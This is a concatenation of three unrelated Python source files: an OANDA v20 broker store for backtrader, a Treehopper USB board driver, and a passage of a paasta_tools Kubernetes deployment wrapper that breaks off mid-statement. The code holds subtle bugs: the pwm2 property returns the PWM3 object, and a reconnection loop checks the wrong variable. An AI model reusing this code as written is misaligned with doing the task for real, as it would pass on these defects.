response = self.oapi.transaction.range(
self.p.account,
fromID=from_id,
toID=to_id)
transactions = response.get('transactions', 200)
if exclude_outer:
del transactions[0], transactions[-1]
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_transactions_since(self, id):
'''Returns all transactions since id'''
try:
response = self.oapi.transaction.since(
self.p.account,
id=id)
transactions = response.get('transactions', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
try:
return transactions
except NameError:
return None
def get_cash(self):
'''Returns the available cash'''
return self._cash
def get_value(self):
'''Returns the account balance'''
return self._value
def get_currency(self):
'''Returns the currency of the account'''
return self._currency
def get_leverage(self):
'''Returns the leverage of the account'''
return self._leverage
def broker_threads(self):
'''Creates threads for broker functionality'''
self.q_account = queue.Queue()
self.q_account.put(True) # force an immediate update
t = threading.Thread(target=self._t_account)
t.daemon = True
t.start()
self.q_ordercreate = queue.Queue()
t = threading.Thread(target=self._t_order_create)
t.daemon = True
t.start()
self.q_orderclose = queue.Queue()
t = threading.Thread(target=self._t_order_cancel)
t.daemon = True
t.start()
# Wait once for the values to be set
self._evt_acct.wait(self.p.account_poll_freq)
def streaming_events(self):
'''Creates threads for event streaming'''
q = queue.Queue()
kwargs = {'q': q}
t = threading.Thread(target=self._t_streaming_events, kwargs=kwargs)
t.daemon = True
t.start()
return q
def streaming_prices(self, dataname):
'''Creates threads for price streaming'''
q = queue.Queue()
kwargs = {'q': q, 'dataname': dataname}
t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs)
t.daemon = True
t.start()
return q
def order_create(self, order, stopside=None, takeside=None, **kwargs):
'''Creates an order'''
okwargs = dict()
okwargs['instrument'] = order.data._dataname
okwargs['units'] = (
abs(int(order.created.size)) if order.isbuy()
else -abs(int(order.created.size))) # negative for selling
okwargs['type'] = self._ORDEREXECS[order.exectype]
okwargs['replace'] = order.info.get('replace', None)
okwargs['replace_type'] = order.info.get('replace_type', None)
if order.exectype != bt.Order.Market:
okwargs['price'] = format(
order.created.price,
'.%df' % order.data.contractdetails['displayPrecision'])
if order.valid is None:
okwargs['timeInForce'] = 'GTC' # good to cancel
else:
okwargs['timeInForce'] = 'GTD' # good to date
gtdtime = order.data.num2date(order.valid, tz=timezone.utc)
okwargs['gtdTime'] = gtdtime.strftime(self._DATE_FORMAT)
if order.exectype == bt.Order.StopTrail:
if 'replace' not in okwargs:
raise Exception('replace param needed for StopTrail order')
trailamount = order.trailamount
if order.trailpercent:
trailamount = order.price * order.trailpercent
okwargs['distance'] = format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision'])
if stopside is not None:
if stopside.exectype == bt.Order.StopTrail:
trailamount = stopside.trailamount
if stopside.trailpercent:
trailamount = order.price * stopside.trailpercent
okwargs['trailingStopLossOnFill'] = v20.transaction.TrailingStopLossDetails(
distance=format(
trailamount,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
else:
okwargs['stopLossOnFill'] = v20.transaction.StopLossDetails(
price=format(
stopside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(stopside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
if takeside is not None and takeside.price is not None:
okwargs['takeProfitOnFill'] = v20.transaction.TakeProfitDetails(
price=format(
takeside.price,
'.%df' % order.data.contractdetails['displayPrecision']),
clientExtensions=v20.transaction.ClientExtensions(
id=self._oref_to_client_id(takeside.ref),
comment=json.dumps(order.info)
).dict()
).dict()
# store backtrader order ref in client extensions
okwargs['clientExtensions'] = v20.transaction.ClientExtensions(
id=self._oref_to_client_id(order.ref),
comment=json.dumps(order.info)
).dict()
okwargs.update(**kwargs) # anything from the user
self.q_ordercreate.put((order.ref, okwargs,))
# notify orders of being submitted
self.broker._submit(order.ref)
if stopside is not None: # don't make price on stopside mandatory
self.broker._submit(stopside.ref)
if takeside is not None and takeside.price is not None:
self.broker._submit(takeside.ref)
return order
def order_cancel(self, order):
'''Cancels a order'''
self.q_orderclose.put(order.ref)
return order
def candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst=True, onlyComplete=True):
'''Returns historical rates'''
q = queue.Queue()
kwargs = {'dataname': dataname, 'dtbegin': dtbegin, 'dtend': dtend,
'timeframe': timeframe, 'compression': compression,
'candleFormat': candleFormat, 'includeFirst': includeFirst,
'onlyComplete': onlyComplete, 'q': q}
t = threading.Thread(target=self._t_candles, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _oref_to_client_id(self, oref):
'''Converts a oref to client id'''
id = '{}-{}'.format(self._client_id_prefix, oref)
return id
def _client_id_to_oref(self, client_id):
'''Converts a client id to oref'''
oref = None
if str(client_id).startswith(self._client_id_prefix):
oref = int(str(client_id)[len(self._client_id_prefix)+1:])
return oref
def _t_account(self):
'''Callback method for account request'''
while True:
try:
msg = self.q_account.get(timeout=self.p.account_poll_freq)
if msg is None:
break # end of thread
except queue.Empty: # tmout -> time to refresh
pass
try:
response = self.oapi.account.summary(self.p.account)
accinfo = response.get('account', 200)
response = self.oapi.position.list_open(self.p.account)
pos = response.get('positions', 200)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if self.p.reconnections == 0:
self.put_notification('Giving up fetching account summary')
return
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
return
try:
self._cash = accinfo.marginAvailable
self._value = accinfo.balance
self._currency = accinfo.currency
self._leverage = 1/accinfo.marginRate
#reset
self._server_positions = collections.defaultdict(OandaPosition)
#Position
# convert positions to dict
_utc_now = datetime.utcnow()
for idx, val in enumerate(pos):
pos[idx] = val.dict()
for p in pos:
size = float(p['long']['units']) + float(p['short']['units'])
price = (
float(p['long']['averagePrice']) if size > 0
else float(p['short']['averagePrice']))
self._server_positions[p['instrument']] = OandaPosition(size, price,dt=_utc_now)
except KeyError:
pass
# notify of success, initialization waits for it
self._evt_acct.set()
def _t_streaming_events(self, q):
'''Callback method for streaming events'''
last_id = None
reconnections = 0
while True:
try:
response = self.oapi_stream.transaction.stream(
self.p.account
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'transaction.TransactionHeartbeat':
if not last_id:
last_id = msg.lastTransactionID
# if a reconnection occurred
if reconnections > 0:
if last_id:
# get all transactions between the last seen and first from
# reconnected stream
old_transactions = self.get_transactions_since(
last_id)
for t in old_transactions:
if msg_type == 'transaction.Transaction':
if t.id > last_id:
self._transaction(t.dict())
last_id = t.id
reconnections = 0
if msg_type == 'transaction.Transaction':
if not last_id or msg.id > last_id:
self._transaction(msg.dict())
last_id = msg.id
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
# unable to reconnect after x times
self.put_notification('Giving up reconnecting streaming events')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification('Trying to reconnect streaming events ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_streaming_prices(self, dataname, q):
'''Callback method for streaming prices'''
try:
response = self.oapi_stream.pricing.stream(
self.p.account,
instruments=dataname,
)
# process response
for msg_type, msg in response.parts():
if msg_type == 'pricing.ClientPrice':
# put price into queue as dict
q.put(msg.dict())
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
# notify feed of error
q.put({'msg': 'CONNECTION_ISSUE'})
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
def _t_candles(self, dataname, dtbegin, dtend, timeframe, compression,
candleFormat, includeFirst, onlyComplete, q):
'''Callback method for candles request'''
granularity = self.get_granularity(timeframe, compression)
if granularity is None:
q.put(None)
return
dtkwargs = {}
if dtbegin is not None:
dtkwargs['fromTime'] = dtbegin.strftime(self._DATE_FORMAT)
dtkwargs['includeFirst'] = includeFirst
count = 0
reconnections = 0
while True:
if count > 1:
dtkwargs['includeFirst'] = False
try:
response = self.oapi.instrument.candles(
dataname,
granularity=granularity,
price=candleFormat,
**dtkwargs)
candles = response.get('candles', 200)
reconnections = 0
count += 1
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
if (self.p.reconnections == 0 or self.p.reconnections > 0
and reconnections > self.p.reconnections):
self.put_notification('Giving up fetching candles')
return
reconnections += 1
if self.p.reconntimeout is not None:
_time.sleep(self.p.reconntimeout)
self.put_notification(
'Trying to fetch candles ({} of {})'.format(
reconnections,
self.p.reconnections))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
dtobj = None
for candle in candles:
# get current candle time
dtobj = datetime.utcfromtimestamp(float(candle.time))
# if end time is provided, check if time is reached for
# every candle
if dtend is not None and dtobj > dtend:
break
# add candle
if not onlyComplete or candle.complete:
q.put(candle.dict())
if dtobj is not None:
dtkwargs['fromTime'] = dtobj.strftime(self._DATE_FORMAT)
elif dtobj is None:
break
if dtend is not None and dtobj > dtend:
break
if len(candles) == 0:
break
q.put({}) # end of transmission'''
def _transaction(self, trans):
if self.p.notif_transactions:
self.put_notification(str(trans))
oid = None
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
# get order id (matches transaction id)
oid = trans['id']
oref = None
# identify backtrader order by checking client
# extensions (this is set when creating a order)
if 'clientExtensions' in trans:
# assume backtrader created the order for this transaction
oref = self._client_id_to_oref(trans['clientExtensions']['id'])
if oref is not None:
self._orders[oid] = oref
elif ttype in self._X_FILL_TRANS:
# order was filled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_CANCEL_TRANS:
# order was cancelled, notify backtrader of it
oid = trans['orderID']
elif ttype in self._X_REJECT_TRANS:
# transaction was rejected, notify backtrader of it
oid = trans['requestID']
elif ttype in self._X_IGNORE_TRANS:
# transaction can be ignored
msg = 'Received transaction {} with id {}. Ignoring transaction.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
else:
msg = 'Received transaction {} with id {}. Unknown situation.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
return
if oid in self._orders:
# when an order id exists process transaction
self._process_transaction(oid, trans)
self._process_trades(self._orders[oid], trans)
else:
# external order created this transaction
self.get_server_position(update_latest=True)
if self.broker.p.use_positions and ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
for data in self.datas:
if data._name == trans['instrument']:
self.broker._fill_external(data, size, price)
break
elif ttype not in self._X_IGNORE_TRANS:
# notify about unknown transaction
if self.broker.p.use_positions:
msg = 'Received external transaction {} with id {}. Skipping transaction.'
else:
msg = 'Received external transaction {} with id {}. Positions and trades may not match anymore.'
msg = msg.format(ttype, trans['id'])
self.put_notification(msg, trans)
def _process_transaction(self, oid, trans):
try:
# get a reference to a backtrader order based on
# the order id / trade id
oref = self._orders[oid]
except KeyError:
return
ttype = trans['type']
if ttype in self._X_CREATE_TRANS:
self.broker._accept(oref)
elif ttype in self._X_FILL_TRANS:
size = float(trans['units'])
price = float(trans['price'])
self.broker._fill(oref, size, price, reason=trans['reason'])
# store order ids which generated by the order
if 'tradeOpened' in trans:
self._orders[trans['tradeOpened']['tradeID']] = oref
if 'tradeReduced' in trans:
self._orders[trans['tradeReduced']['tradeID']] = oref
elif ttype in self._X_CANCEL_TRANS:
reason = trans['reason']
if reason == 'TIME_IN_FORCE_EXPIRED':
self.broker._expire(oref)
else:
self.broker._cancel(oref)
elif ttype in self._X_REJECT_TRANS:
self.broker._reject(oref)
def _process_trades(self, oref, trans):
if 'tradeID' in trans:
self._trades[oref] = trans['tradeID']
if 'tradeOpened' in trans:
self._trades[oref] = trans['tradeOpened']['tradeID']
if 'tradeClosed' in trans:
self._trades[oref] = trans['tradeClosed']['tradeID']
if 'tradesClosed' in trans:
for t in trans['tradesClosed']:
for key, value in self._trades.copy().items():
if value == t['tradeID']:
del self._trades[key]
def _t_order_create(self):
while True:
msg = self.q_ordercreate.get()
if msg is None:
break
oref, okwargs = msg
try:
if okwargs['replace']:
oid = '@{}'.format(
self._oref_to_client_id(okwargs['replace']))
if okwargs['replace'] in self._trades:
okwargs['tradeID'] = self._trades[okwargs['replace']]
if okwargs['replace_type']:
okwargs['type'] = okwargs['replace_type']
response = self.oapi.order.replace(
self.p.account,
oid,
order=okwargs)
else:
response = self.oapi.order.create(
self.p.account,
order=okwargs)
# get the transaction which created the order
o = response.get('orderCreateTransaction', 201)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
self.broker._reject(oref)
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
self.broker._reject(oref)
continue
def _t_order_cancel(self):
while True:
oref = self.q_orderclose.get()
if oref is None:
break
oid = None
for key, value in self._orders.items():
if value == oref:
oid = key
break
if oid is None:
continue # the order is no longer there
try:
# TODO either close pending orders or filled trades
response = self.oapi.order.cancel(self.p.account, oid)
except (v20.V20ConnectionError, v20.V20Timeout) as e:
self.put_notification(str(e))
continue
except Exception as e:
self.put_notification(
self._create_error_notif(
e, response))
continue
self.broker._cancel(oref)
def _create_error_notif(self, e, response):
try:
notif = '{}: {} - {}'.format(
response.status,
response.reason,
response.get('errorMessage'))
except Exception:
notif = str(e)
return notif
|
treehopper_usb.py
|
import threading
from time import sleep
from typing import List
import usb.core
import usb.util
from treehopper.api.device_commands import DeviceCommands
from treehopper.api.i2c import HardwareI2C
from treehopper.api.pin import Pin, SoftPwmManager
from treehopper.api.pwm import HardwarePwm
from treehopper.api.pwm import HardwarePwmManager
from treehopper.api.spi import HardwareSpi
from treehopper.api.uart import HardwareUart
from treehopper.utils.event_handler import EventHandler
class TreehopperUsb:
"""The core class for communicating with Treehopper USB boards.

Core hardware
=============
%Treehopper is a USB 2.0 Full Speed device with 20 \link pin.Pin Pins\endlink โ each of which can be used as an
analog input, digital input, digital output, or soft-PWM output. Many of these pins also have dedicated peripheral
functions for \link spi.HardwareSpi SPI\endlink, \link i2c.HardwareI2C I2C\endlink,\link uart.HardwareUart
UART\endlink, and \link pwm.HardwarePwm PWM\endlink.
You'll access all the pins, peripherals, and board functions through this class, which will automatically create
all peripheral instances for you.
Example:
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before doing anything else.
>>> board.led = True # Turn on the board's LED.
>>> imu = Mpu9250.probe(board.i2c) # Connect an MPU9250 9-DoF IMU to the I2C interface on the board.
>>> print(imu.accelerometer) # Print the acceleration reading from the sensor.
'[0.95, 0.01, 0.03]'
>>> board.disconnect() # Disconnect from the board when finished.
Getting a board reference
-------------------------
To obtain a reference to the board, use the \link treehopper.api.find_boards.find_boards() find_boards()\endlink
method:
>>> board = find_boards()[0] # Get the first board.
\warning While you're free to create TreehopperUsb variables that reference boards, do not attempt to create a
TreehopperUsb instance manually; always obtain references to boards from the \link
treehopper.api.find_boards.find_boards() find_boards()\endlink function.
Connect to the board
--------------------
Before you use the board, you must explicitly connect to it by calling the connect() method
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before
doing anything else.
\note Once a board is connected, other applications won't be able to use it.
On-board LED
------------
The only peripheral directly exposed by this class is the #led property, which will control the LED's state once
the board is connected. This demo will blink the LED until the board is unplugged:
>>> board = find_boards()[0]
>>> board.connect()
>>> while board.connected:
>>> board.led = not board.led # toggle the LED
>>> sleep(0.1)
Next steps
==========
To learn about accessing different %Treehopper peripherals, visit the doc links to the relevant classes:
\li \link pin.Pin Pin\endlink
\li \link spi.HardwareSpi HardwareSpi\endlink
\li \link i2c.HardwareI2C HardwareI2C\endlink
\li \link uart.HardwareUart HardwareUart\endlink
\li \link pwm.HardwarePwm HardwarePwm\endlink
"""
## \cond PRIVATE
def __init__(self, dev: usb.core.Device):
self._pin_listener_thread = threading.Thread(target=self._pin_listener)
self._dev = dev
self._comms_lock = threading.Lock()
self._pin_update_flag = threading.Event()
self._pin_report_endpoint = 0x81
self._peripheral_response_endpoint = 0x82
self._pin_config_endpoint = 0x01
self._peripheral_config_endpoint = 0x02
self._pins = [] # type: List[Pin]
for i in range(20):
self.pins.append(Pin(self, i))
self.pins[0].name = "Pin 0 (SCK)"
self.pins[1].name = "Pin 1 (MISO)"
self.pins[2].name = "Pin 2 (MOSI)"
self.pins[3].name = "Pin 3 (SDA)"
self.pins[4].name = "Pin 4 (SCL)"
self.pins[5].name = "Pin 5 (TX)"
self.pins[6].name = "Pin 6 (RX)"
self.pins[7].name = "Pin 7 (PWM1)"
self.pins[8].name = "Pin 8 (PWM2)"
self.pins[9].name = "Pin 9 (PWM3)"
self._spi = HardwareSpi(self)
self._i2c = HardwareI2C(self)
self._uart = HardwareUart(self)
self._pwm1 = HardwarePwm(self.pins[7])
self._pwm2 = HardwarePwm(self.pins[8])
self._pwm3 = HardwarePwm(self.pins[9])
self._hardware_pwm_manager = HardwarePwmManager(self)
self._soft_pwm_manager = SoftPwmManager(self)
self._led = False
self._connected = False
self._pin_report_received = EventHandler(self)
## \endcond
## @name Main components
# @{
def connect(self):
"""
Connect to the board.
Calling this method will connect to the board and start the pin listener update thread. Repeated calls to
this method are ignored.
Warning:
You must connect to the board before performing any operations (other than querying the name() or
serial_number() of the board).
Returns:
None
"""
if self._connected:
return
self._dev.set_configuration()
self._connected = True
self._pin_listener_thread.start()
@property
def pins(self):
"""Gets a list of \link pin.Pin pins\endlink that belong to this board"""
return self._pins
@property
def spi(self):
"""Gets the \link spi.HardwareSpi SPI\endlink peripheral that belongs to this board"""
return self._spi
@property
def i2c(self):
"""Gets the \link i2c.HardwareI2C I2C\endlink peripheral that belongs to this board"""
return self._i2c
@property
def uart(self):
"""Gets the \link uart.HardwareUart UART\endlink peripheral that belongs to this board"""
return self._uart
@property
def pwm1(self):
"""Gets the \link pwm.HardwarePwm PWM1\endlink module that belongs to this board"""
return self._pwm1
@property
def pwm2(self):
"""Gets the \link pwm.HardwarePwm PWM2\endlink module that belongs to this board"""
return self._pwm3
@property
def pwm3(self):
"""Gets the \link pwm.HardwarePwm PWM3\endlink module that belongs to this board"""
return self._pwm3
@property
def led(self) -> bool:
"""
Gets or sets the state of the LED.
Example:
>>> while board.connected:
>>> board.led = not board.led # toggle the LED
>>> sleep(0.1)
Returns:
bool: The current state of the LED.
"""
return self._led
@led.setter
def led(self, val: bool) -> None:
self._led = val
data = [DeviceCommands.LedConfig, self._led]
self._send_peripheral_config_packet(data)
def disconnect(self):
"""Disconnect from the board.
This method disconnects from the board and stops the pin listener update thread. Repeated calls to this
method are ignored."""
if not self._connected:
return
self._connected = False
self._pin_listener_thread.join()
usb.util.dispose_resources(self._dev)
@property
def connected(self):
"""
Gets whether the board is connected.
Returns:
bool: Whether the board is connected
Note:
The board will automatically disconnect if an unrecoverable error is encountered (which includes a
disconnect), so this is a useful property to consult to determine if a board is physically attached to a
computer.
"""
return self._connected
## @}
## @name Board identity & firmware management
# @{
@property
def serial_number(self):
"""
Gets the serial number of the board.
This property is available to read even without connecting to the board. If you wish to change the serial
number,
use update_serial_number().
Note:
While you do not need to connect() to the board before querying its serial number, you will not be able to
retrieve the serial number of a board to which another application is connected.
Treehopper's Python API doesn't currently support directly querying the OS for device info, so while
executing \link find_boards.find_boards() find_boards()\endlink, the API implicitly connects to the board,
queries the string descriptor, and disconnects. Since concurrent operation isn't supported, this operation
will error if the board is already open.
Returns:
str: The serial number.
"""
return self._dev.serial_number
@property
def name(self):
"""
Gets the device name of the board.
This property is available to read even without connecting to the board. If you wish to change the device name,
use update_device_name().
Note:
While you do not need to connect() to the board before querying its device name, you will not be able to
retrieve the device name of a board to which another application is connected.
Treehopper's Python API doesn't currently support directly querying the OS for device info, so while
executing \link find_boards.find_boards() find_boards()\endlink, the API implicitly connects to the board,
queries the string descriptor, and disconnects. Since concurrent operation isn't supported, this operation
will error if the board is already open.
Returns:
str: The device name.
"""
return self._dev.product
def update_serial_number(self, serial_number: str):
"""
Update the serial number on the device.
While the new serial number is immediately available from the SerialNumber property, the changes will not take
effect in other applications until the device is reset. This can be done by calling reboot().
Args:
serial_number: a 60-character (or fewer) string containing the new serial number (str).
Returns:
None
Examples:
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before doing anything else.
>>> board.update_serial_number("a3bY392") # Change the serial number.
>>> board.reboot() # Reboot the board so the OS picks up the changes.
"""
length = len(serial_number)
if length > 60:
raise RuntimeError("String must be 60 characters or less")
data_to_send = [DeviceCommands.FirmwareUpdateSerial, length] + list(serial_number.encode())
self._send_peripheral_config_packet(data_to_send)
sleep(0.1)
def update_device_name(self, device_name: str):
"""
Update the device name on the device.
While the new serial number is immediately available from the SerialNumber property, the changes will not take
effect in other applications until the device is reset. This can be done by calling reboot().
Note:
Microsoft Windows caches the device name in the registry when it is first attached to the board, so even if
you change the device name with this function, you won't see the new device name --- even after replugging
the board. To force Windows to update theregistry with the new name, make sure to change the serial number,
too (see update_serial_number()).
Args:
device_name: a 60-character (or fewer) string containing the new device name (str).
Returns:
None
Examples:
>>> board = find_boards()[0] # Get the first board.
>>> board.connect() # Be sure to connect before doing anything else.
>>> board.update_device_name("Acme Widget") # Update the device name.
>>> board.update_serial_number("a3bY392") # Change the serial number to force Windows refresh.
>>> board.reboot() # Reboot the board so the OS picks up the changes.
"""
length = len(device_name)
if length > 60:
raise RuntimeError("String must be 60 characters or less")
data_to_send = [DeviceCommands.FirmwareUpdateName, length] + list(device_name.encode())
self._send_peripheral_config_packet(data_to_send)
sleep(0.1)
## @}
## @name Other components
# @{
def reboot(self):
"""
Reboots the board.
Calling this method will automatically call the disconnect() method, and no further communication will be
possible until the board is reopened.
Returns:
None
"""
self._send_peripheral_config_packet([DeviceCommands.Reboot])
self.disconnect()
def reboot_into_bootloader(self):
"""
Reboots the board into bootloader mode.
Calling this method will automatically call the disconnect() method, and no further communication will be
possible. You can load new firmware onto the board once in bootloader mode, or if you wish to return to normal
operation, replug the board to reset it.
Returns:
None
"""
self._send_peripheral_config_packet([DeviceCommands.EnterBootloader])
self.disconnect()
def await_pin_update(self):
""" Returns when the board has received a new pin update """
self._pin_update_flag.clear()
self._pin_update_flag.wait()
@property
def hardware_pwm_manager(self):
"""Gets the hardware PWM manager for this board"""
return self._hardware_pwm_manager
## @}
def _pin_listener(self):
while self._connected:
try:
data = self._dev.read(self._pin_report_endpoint, 41, 1000)
i = 1
if data[0] == 0x02:
for pin in self.pins:
pin._update_value(data[i], data[i + 1])
i += 2
self._pin_update_flag.set()
except usb.USBError as e:
if e.errno == 10060: # timeout win32
pass
elif e.errno == 110: # timeout libusb
pass
elif e.errno == 60: # timeout macos
pass
else:
self._connected = False
return
def _send_pin_config(self, data: List[int]):
try:
self._dev.write(self._pin_config_endpoint, data)
except usb.USBError:
self._connected = False
def _send_peripheral_config_packet(self, data: List[int]):
try:
self._dev.write(self._peripheral_config_endpoint, data)
except usb.USBError:
self._connected = False
def _receive_comms_response_packet(self, num_bytes_to_read: int) -> List[int]:
try:
return self._dev.read(self._peripheral_response_endpoint, num_bytes_to_read)
except usb.USBError:
self._connected = False
return [0] * num_bytes_to_read
|
controller_wrappers.py
|
import logging
import threading
from abc import ABC
from abc import abstractmethod
from time import sleep
from typing import Optional
from typing import Union
from kubernetes.client import V1beta1PodDisruptionBudget
from kubernetes.client import V1DeleteOptions
from kubernetes.client import V1Deployment
from kubernetes.client import V1StatefulSet
from kubernetes.client.rest import ApiException
from paasta_tools.autoscaling.autoscaling_service_lib import autoscaling_is_paused
from paasta_tools.kubernetes_tools import create_deployment
from paasta_tools.kubernetes_tools import create_pod_disruption_budget
from paasta_tools.kubernetes_tools import create_stateful_set
from paasta_tools.kubernetes_tools import force_delete_pods
from paasta_tools.kubernetes_tools import KubeClient
from paasta_tools.kubernetes_tools import KubeDeployment
from paasta_tools.kubernetes_tools import KubernetesDeploymentConfig
from paasta_tools.kubernetes_tools import list_all_deployments
from paasta_tools.kubernetes_tools import load_kubernetes_service_config_no_cache
from paasta_tools.kubernetes_tools import paasta_prefixed
from paasta_tools.kubernetes_tools import pod_disruption_budget_for_service_instance
from paasta_tools.kubernetes_tools import update_deployment
from paasta_tools.kubernetes_tools import update_stateful_set
from paasta_tools.utils import load_system_paasta_config
class Application(ABC):
def __init__(
self,
item: Union[V1Deployment, V1StatefulSet],
logging=logging.getLogger(__name__),
) -> None:
"""
This Application wrapper is an interface for creating/deleting k8s deployments and statefulsets
soa_config is KubernetesDeploymentConfig. It is not loaded in init because it is not always required.
:param item: Kubernetes Object(V1Deployment/V1StatefulSet) that has already been filled up.
:param logging: where logs go
"""
if not item.metadata.namespace:
item.metadata.namespace = "paasta"
attrs = {
attr: item.metadata.labels[paasta_prefixed(attr)]
for attr in ["service", "instance", "git_sha", "config_sha"]
}
self.kube_deployment = KubeDeployment(replicas=item.spec.replicas, **attrs)
self.item = item
self.soa_config = None # type: KubernetesDeploymentConfig
self.logging = logging
def load_local_config(
self, soa_dir: str, cluster: str
) -> Optional[KubernetesDeploymentConfig]:
if not self.soa_config:
self.soa_config = load_kubernetes_service_config_no_cache(
service=self.kube_deployment.service,
instance=self.kube_deployment.instance,
cluster=cluster,
soa_dir=soa_dir,
)
return self.soa_config
def __str__(self):
service = self.kube_deployment.service
instance = self.kube_deployment.instance
git_sha = self.kube_deployment.git_sha
config_sha = self.kube_deployment.config_sha
return f"{service}-{instance}-{git_sha}-{config_sha}"
@abstractmethod
def deep_delete(self, kube_client: KubeClient) -> None:
"""
Remove all controllers, pods, and pod disruption budgets related to this application
:param kube_client:
"""
pass
def create(self, kube_client: KubeClient):
"""
Create all controllers, HPA, and pod disruption budgets related to this application
:param kube_client:
"""
pass
def update(self, kube_client: KubeClient):
"""
Update all controllers, HPA, and pod disruption budgets related to this application
:param kube_client:
"""
pass
def update_related_api_objects(self, kube_client: KubeClient) -> None:
"""
Update related Kubernetes API objects such as HPAs and Pod Disruption Budgets
:param kube_client:
"""
self.ensure_pod_disruption_budget(kube_client)
def delete_pod_disruption_budget(self, kube_client: KubeClient) -> None:
try:
kube_client.policy.delete_namespaced_pod_disruption_budget(
name=self.item.metadata.name,
namespace=self.item.metadata.namespace,
body=V1DeleteOptions(),
)
except ApiException as e:
if e.status == 404:
# Deployment does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent pod disruption budget/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted pod disruption budget/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
def ensure_pod_disruption_budget(
self, kube_client: KubeClient
) -> V1beta1PodDisruptionBudget:
max_unavailable: Union[str, int]
if "bounce_margin_factor" in self.soa_config.config_dict:
max_unavailable = (
f"{int((1 - self.soa_config.get_bounce_margin_factor()) * 100)}%"
)
else:
system_paasta_config = load_system_paasta_config()
max_unavailable = system_paasta_config.get_pdb_max_unavailable()
pdr = pod_disruption_budget_for_service_instance(
service=self.kube_deployment.service,
instance=self.kube_deployment.instance,
max_unavailable=max_unavailable,
)
try:
existing_pdr = kube_client.policy.read_namespaced_pod_disruption_budget(
name=pdr.metadata.name, namespace=pdr.metadata.namespace
)
except ApiException as e:
if e.status == 404:
existing_pdr = None
else:
raise
if existing_pdr:
if existing_pdr.spec.min_available is not None:
logging.info(
"Not updating poddisruptionbudget: can't have both "
"min_available and max_unavailable"
)
elif existing_pdr.spec.max_unavailable != pdr.spec.max_unavailable:
logging.info(f"Updating poddisruptionbudget {pdr.metadata.name}")
return kube_client.policy.patch_namespaced_pod_disruption_budget(
name=pdr.metadata.name, namespace=pdr.metadata.namespace, body=pdr
)
else:
logging.info(f"poddisruptionbudget {pdr.metadata.name} up to date")
else:
logging.info(f"creating poddisruptionbudget {pdr.metadata.name}")
return create_pod_disruption_budget(
kube_client=kube_client, pod_disruption_budget=pdr
)
class DeploymentWrapper(Application):
def deep_delete(self, kube_client: KubeClient) -> None:
"""
Remove all controllers, pods, and pod disruption budgets related to this application
:param kube_client:
"""
delete_options = V1DeleteOptions(propagation_policy="Foreground")
try:
kube_client.deployments.delete_namespaced_deployment(
self.item.metadata.name,
self.item.metadata.namespace,
body=delete_options,
)
except ApiException as e:
if e.status == 404:
# Deployment does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent deploy/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
else:
raise
else:
self.logging.info(
"deleted deploy/{} from namespace/{}".format(
self.item.metadata.name, self.item.metadata.namespace
)
)
self.delete_pod_disruption_budget(kube_client)
self.delete_horizontal_pod_autoscaler(kube_client)
def get_existing_app(self, kube_client: KubeClient):
return kube_client.deployments.read_namespaced_deployment(
name=self.item.metadata.name, namespace=self.item.metadata.namespace
)
def create(self, kube_client: KubeClient) -> None:
create_deployment(kube_client=kube_client, formatted_deployment=self.item)
self.ensure_pod_disruption_budget(kube_client)
self.sync_horizontal_pod_autoscaler(kube_client)
def deep_delete_and_create(self, kube_client: KubeClient) -> None:
self.deep_delete(kube_client)
timer = 0
while (
self.kube_deployment in set(list_all_deployments(kube_client))
and timer < 60
):
sleep(1)
timer += 1
if timer >= 60 and self.kube_deployment in set(
list_all_deployments(kube_client)
):
try:
force_delete_pods(
self.item.metadata.name,
self.kube_deployment.service,
self.kube_deployment.instance,
self.item.metadata.namespace,
kube_client,
)
except ApiException as e:
if e.status == 404:
# Deployment does not exist, nothing to delete but
# we can consider this a success.
self.logging.debug(
"not deleting nonexistent deploy/{} from namespace/{}".format(
